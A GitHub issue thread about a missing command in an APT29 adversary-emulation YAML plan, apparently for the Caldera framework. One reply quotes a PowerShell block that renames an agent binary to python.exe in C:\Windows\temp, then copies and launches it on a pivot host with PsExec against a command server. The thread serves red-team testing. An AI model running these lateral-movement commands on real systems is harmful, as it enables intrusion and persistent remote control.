Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Missing code in the APT29 yaml file #92

Open
Guillaume-Muller opened this issue Jul 2, 2021 · 3 comments
Open

Missing code in the APT29 yaml file #92

Guillaume-Muller opened this issue Jul 2, 2021 · 3 comments

Comments

@Guillaume-Muller
Copy link

In the APT29 yaml file, at line 1749, command of T1105 is missing below the "executors" tag :

line 1746 executors:
line 1747 - name: powershell
line 1748 command: |
line 1749
line 1750 - id: 0b1841bd-ef8b-475c-bce7-8fcb2860984a

@Thamane
Copy link

Thamane commented Jul 2, 2021

Hello,

It is missing but it should not be a problem execution wise as the part that is actually executed by caldera is line 1722 :

platforms:
    windows:
      psh,pwsh:
        command: |
          move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force;
          set-location "C:\Program Files\SysinternalsSuite\";
          .\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}";
          tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe";
        payloads:
        - sandcat.go-windows-upx 

@Guillaume-Muller
Copy link
Author

Guillaume-Muller commented Jul 2, 2021 via email

@Thamane
Copy link

Thamane commented Jul 2, 2021

Sorry I do not have such a script at hand.

In your case just copying the command at 1722 and pasting it line 1749 will solve your problem. The executors yaml key is not parsed by caldera and is here probably for backward compatibility/cross compatibility for other framework like ATOMIC ? At least it is what is explained in this blog article :

The machine-readable Emulation Plan representation would be implemented in YAML. The YAML format would be as consistent as possible with accepted industry approaches to automated emulation. In the case of our YAML format, we started from the established Red Canary Atomic Red Team format but made some modifications to capture the threat intelligence that informs the emulation and to ensure a direct correlation between the human-readable and machine-readable versions of the Emulation Plan.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants